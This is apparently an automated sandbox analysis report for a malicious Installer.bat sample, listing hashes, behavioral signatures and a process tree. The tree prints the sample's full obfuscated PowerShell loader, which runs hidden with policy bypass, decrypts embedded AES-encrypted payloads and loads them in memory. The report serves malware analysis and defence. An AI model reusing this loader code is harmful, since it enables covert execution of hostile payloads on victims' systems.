Analysis
- max time kernel: 27s
- max time network: 18s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 24-05-2024 03:05
Static task: static1
Behavioral task: behavioral1
- Sample: Installer.bat
- Resource: win7-20240221-en (windows7-x64)
- 5 signatures, 30 seconds
Behavioral task: behavioral2
- Sample: Installer.bat
- Resource: win10v2004-20240508-en (windows10-2004-x64)
- 17 signatures, 30 seconds
General
- Target: Installer.bat
- Size: 66KB
- MD5: c51a341d4045678ac21ec499e8c9e992
- SHA1: 0e44988a81ff21a58456c3b782c7a51aafde1358
- SHA256: f5650b450dedd0a0fec4a59e7412d1312352bd9088c5d2e934f863926b1c5dad
- SHA512: 8c51dd3ab2992871f702b255551f45c6cb2ed937774eac027a87dc4f2e2926a45433b4e56fc8e90dcf40a465d79280c0212c364070bd7e1dd6dfec177a430159
- SSDEEP: 1536:NoQ26vCtla+UARVN2PUPFK9QBib9ZKL/FhtGif3:3hvCvUi2Pi7BiYFhtGif3
- Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
  pid   process
  2076  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  description               pid   process
  Token: SeDebugPrivilege   2076  powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes:
  description          pid   process    target pid  target process
  wrote to memory of   2808  cmd.exe    2084        net.exe
  wrote to memory of   2808  cmd.exe    2084        net.exe
  wrote to memory of   2808  cmd.exe    2084        net.exe
  wrote to memory of   2084  net.exe    2248        net1.exe
  wrote to memory of   2084  net.exe    2248        net1.exe
  wrote to memory of   2084  net.exe    2248        net1.exe
  wrote to memory of   2808  cmd.exe    2076        powershell.exe
  wrote to memory of   2808  cmd.exe    2076        powershell.exe
  wrote to memory of   2808  cmd.exe    2076        powershell.exe
Processes
- [1] C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\Installer.bat"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    net file
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nXSajZrUqAqKVdHyYRJ6lyU21T//NNE+X+mj0zre9EE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U/eGnrmPpGq50sOwe1VcYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FZRrB=New-Object System.IO.MemoryStream(,$param_var); $UumYj=New-Object System.IO.MemoryStream; $PwqjF=New-Object System.IO.Compression.GZipStream($FZRrB, [IO.Compression.CompressionMode]::Decompress); $PwqjF.CopyTo($UumYj); $PwqjF.Dispose(); $FZRrB.Dispose(); $UumYj.Dispose(); $UumYj.ToArray();}function execute_function($param_var,$param2_var){ $zsNFP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XrMDq=$zsNFP.EntryPoint; $XrMDq.Invoke($null, $param2_var);}$iBKJy = 'C:\Users\Admin\AppData\Local\Temp\Installer.bat';$host.UI.RawUI.WindowTitle = $iBKJy;$PJEAO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iBKJy).Split([Environment]::NewLine);foreach ($NJOsI in $PJEAO) { if ($NJOsI.StartsWith(':: ')) { $JySyT=$NJOsI.Substring(3); break; }}$payloads_var=[string[]]$JySyT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- memory/2076-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp (Filesize 9.6MB)
- memory/2076-8-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp (Filesize 9.6MB)
- memory/2076-7-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp (Filesize 9.6MB)
- memory/2076-6-0x0000000002220000-0x0000000002228000-memory.dmp (Filesize 32KB)
- memory/2076-5-0x000000001B0F0000-0x000000001B3D2000-memory.dmp (Filesize 2.9MB)
- memory/2076-4-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp (Filesize 4KB)
- memory/2076-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp (Filesize 9.6MB)
- memory/2076-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp (Filesize 9.6MB)
- memory/2076-12-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp (Filesize 9.6MB)